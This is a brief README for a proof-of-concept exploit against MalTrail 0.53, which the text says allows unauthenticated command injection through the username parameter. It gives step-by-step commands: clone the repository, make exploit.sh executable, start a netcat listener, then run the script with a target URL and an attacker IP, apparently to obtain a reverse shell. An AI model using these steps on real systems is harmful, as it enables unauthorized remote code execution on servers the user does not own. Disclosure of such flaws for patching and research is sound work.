MalTrail - Command Injection / RCE PoC Exploit
MalTrail version 0.53 doesn't have proper validation in username parameter, which leads to unauthenticated command injection.
git clone https://github.com/rvizx/maltrail-rce
cd maltrail-rce
chmod +x exploit.sh
make sure to start a listener before executing the exploit.sh
nc -lvnp 1337
./exploit.sh <target_url> <attacker_ip>
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/